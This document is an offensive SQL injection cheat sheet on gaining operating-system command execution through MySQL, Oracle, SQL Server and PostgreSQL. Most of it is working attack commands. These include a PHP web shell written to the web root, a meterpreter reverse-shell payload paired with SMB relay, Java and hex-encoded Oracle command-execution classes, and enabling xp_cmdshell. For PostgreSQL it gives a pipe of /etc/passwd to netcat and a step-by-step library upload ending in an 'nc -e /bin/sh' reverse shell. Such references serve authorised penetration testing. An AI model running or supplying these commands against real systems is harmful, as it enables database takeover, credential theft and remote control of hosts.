Executing OS Commands Through MySQL

Running OS commands is one of the primary objectives of SQL injection, this aids in getting full control of the host OS. This may happen by directly executing commands, modifying existing data to put a shell on a webpage, or exploiting hidden functionality in the database.

Description Query
Command Execution (PHP) SELECT "<? echo passthru($_GET['cmd']); ?>" INTO OUTFILE '/var/www/shell.php'
Command Execution with MySQL CLI Access https://infamoussyn.wordpress.com/2014/07/11/gaining-a-root-shell-using-mysql-user-defined-functions-and-setuid-binaries/

SMB Relay Shell

* Metasploit
* smbrelayx

Generate the reverse shell payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST=YOUR.IP.GOES.HERE LPORT=443 -f exe > reverse_shell.exe

Generate a listener to deliver the reverse shell

smbrelayx.py -h VICTIM.IP.GOES.HERE -e ./reverse_shell.exe

Execute any one of the MySQL queries below to call the listener

select load_file('\\\\YOUR.IP.GOES.HERE\\aa');
select load_file(0x5c5c5c5c3139322e3136382e302e3130315c5c6161);
select 'netspi' into dumpfile '\\\\YOUR.IP.GOES.HERE\\aa';
select 'netspi' into outfile '\\\\YOUR.IP.GOES.HERE\\aa';
load data infile '\\\\YOUR.IP.GOES.HERE\\aa' into table database.table_name;

For more information see here

Executing OS Commands Through Oracle

Running OS commands is one of the primary objectives of SQL injection, this aids in getting full control of the host OS. This may happen by directly executing commands, modifying existing data to put a shell on a webpage, or exploiting hidden functionality in the database.

Java can be used to execute commands if it's installed.

Description Query
Creating Java Classes /* create Java class */
EXECUTE IMMEDIATE 'create or replace and compile java source named "PwnUtil" as import java.io.*; public class PwnUtil{ public static String runCmd(String args){ try{ BufferedReader myReader = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(args).getInputStream()));String stemp, str = "";while ((stemp = myReader.readLine()) != null) str += stemp + "\n";myReader.close();return str;} catch (Exception e){ return e.toString();}} public static String readFile(String filename){ try{ BufferedReader myReader = new BufferedReader(new FileReader(filename));String stemp, str = "";while((stemp = myReader.readLine()) != null) str += stemp + "\n";myReader.close();return str;} catch (Exception e){ return e.toString();}}};';

EXECUTE IMMEDIATE 'create or replace function PwnUtilFunc(p_cmd in varchar2) return varchar2 as language java name ''PwnUtil.runCmd(java.lang.String) return String'';';

/* run OS command */
SELECT PwnUtilFunc('ping -c 4 localhost') FROM dual;
Creating Java Classes (Hex encoded) /* create Java class */
SELECT TO_CHAR(dbms_xmlquery.getxml('declare PRAGMA AUTONOMOUS_TRANSACTION; begin execute immediate utl_raw.cast_to_varchar2(hextoraw(''637265617465206f72207265706c61636520616e6420636f6d70696c65206a61766120736f75726365206e616d6564202270776e7574696c2220617320696d706f7274206a6176612e696f2e2a3b7075626c696320636c6173732070776e7574696c7b7075626c69632073746174696320537472696e672072756e28537472696e672061726773297b7472797b4275666665726564526561646572206d726561643d6e6577204275666665726564526561646572286e657720496e70757453747265616d5265616465722852756e74696d652e67657452756e74696d6528292e657865632861726773292e676574496e70757453747265616d282929293b20537472696e67207374656d702c207374723d22223b207768696c6528287374656d703d6d726561642e726561644c696e6528292920213d6e756c6c29207374722b3d7374656d702b225c6e223b206d726561642e636c6f736528293b2072657475726e207374723b7d636174636828457863657074696f6e2065297b72657475726e20652e746f537472696e6728293b7d7d7d''));
EXECUTE IMMEDIATE utl_raw.cast_to_varchar2(hextoraw(''637265617465206f72207265706c6163652066756e6374696f6e2050776e5574696c46756e6328705f636d6420696e207661726368617232292072657475726e207661726368617232206173206c616e6775616765206a617661206e616d65202770776e7574696c2e72756e286a6176612e6c616e672e537472696e67292072657475726e20537472696e67273b'')); end;')) results FROM dual

/* run OS command */
SELECT PwnUtilFunc('ping -c 4 localhost') FROM dual;

Executing OS Commands Through SQL Server

Running OS commands is one of the primary objectives of SQL injection, this aids in getting full control of the host OS. This may happen by directly executing commands, modifying existing data to put a shell on a webpage, or exploiting hidden functionality in the database.

Name Query
xp_cmdshell -- Enable show advanced options
sp_configure 'show advanced options', 1

-- Enable xp_cmdshell
sp_configure 'xp_cmdshell', 1

EXEC xp_cmdshell 'net user'
Write to registry autorun https://blog.netspi.com/establishing-registry-persistence-via-sql-server-powerupsql/
Write to file autorun https://blog.netspi.com/how-to-hack-database-links-in-sql-server/
Agent Jobs https://www.optiv.com/blog/mssql-agent-jobs-for-command-execution
SQL Injection in stored procedures https://blog.netspi.com/hacking-sql-server-stored-procedures-part-3-sqli-and-user-impersonation/
CLR Assembly https://blog.netspi.com/attacking-sql-server-clr-assemblies/
Custom Extended Stored Procedure https://github.com/NetSPI/PowerUpSQL/blob/master/templates/cmd_exec.cpp


Name Query
ActiveX Javascript Agent Job https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/oscmdexec_agentjob_activex_jscript.sql
ActiveX VBScript Agent Job https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/oscmdexec_agentjob_activex_vbscript.sql
cmdexec Agent Job https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/oscmdexec_agentjob_cmdexec.sql
Powershell Agent Job https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/oscmdexec_agentjob_powershell.sql
Custom Command Shell https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/oscmdexec_customxp.cpp
OLE Automation Object https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/oscmdexec_oleautomationobject.sql
OPENROWSET https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/oscmdexec_openrowset.sql
Python https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/oscmdexec_pythonscript.tsql
R https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/oscmdexec_rscript.sql
xp_cmdshell proxy https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/oscmdexec_xpcmdshell_proxy.sql

Executing OS Commands Through PostgreSQL

Running OS commands is one of the primary objectives of SQL injection, this aids in getting full control of the host OS. This may happen by directly executing commands, modifying existing data to put a shell on a webpage, or exploiting hidden functionality in the database.

Name Query


CREATE TABLE myoutput(filename text);
COPY myoutput FROM PROGRAM 'ps aux';
SELECT * FROM myoutput ORDER BY filename ASC;

Create PostgreSQL Function Mapped  
to Libc System Method

CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE 'c' STRICT;
SELECT system('cat /etc/passwd | nc ');

This method works with PostgreSQL 8.1 and below. After version 9, you'll have to upload your own library with the "PG_MODULE_MAGIC" set.
The process for this is outlined at https://www.dionach.com/blog/postgresql-9x-remote-command-execution, below is a summary.

1. To get the version from the PostgreSQL server use the query below.

SELECT version();

2. To compile the library, a Linux machine with the same version of PostgreSQL as the target machine is required. Below is an example showing how to install PostgreSQL.

apt install postgresql postgresql-server-dev-9.6

3. Download pgexec file from https://github.com/Dionach/pgexec/tree/master.

4. Compile pgexec with the command below.

gcc -I$(/usr/local/pgsql/bin/pg_config --includedir-server) -shared -fPIC -o pg_exec.so pg_exec.c

5. Upload the library to the target system. First split the file into pieces.

split -b 2048 pg_exec.so

6. The file can then be written to disk through PostgreSQL using the commands below.

SELECT lo_creat(-1);
set c0 `base64 -w 0 xaa`
INSERT INTO pg_largeobject (loid, pageno, data) values (16388, 0, decode(:'c0', 'base64'));

Then repeat for each piece of the file.

7. Create the function.

CREATE FUNCTION sys(cstring) RETURNS int AS '/tmp/pg_exec.so', 'pg_exec' LANGUAGE 'c' STRICT;

8. Send a reverse shell to your system.

SELECT sys('nc -e /bin/sh 4444');

Source: https://www.dionach.com/blog/postgresql-9x-remote-command-execution

Metasploit postgres_payload Module
This can be used with direct connections.


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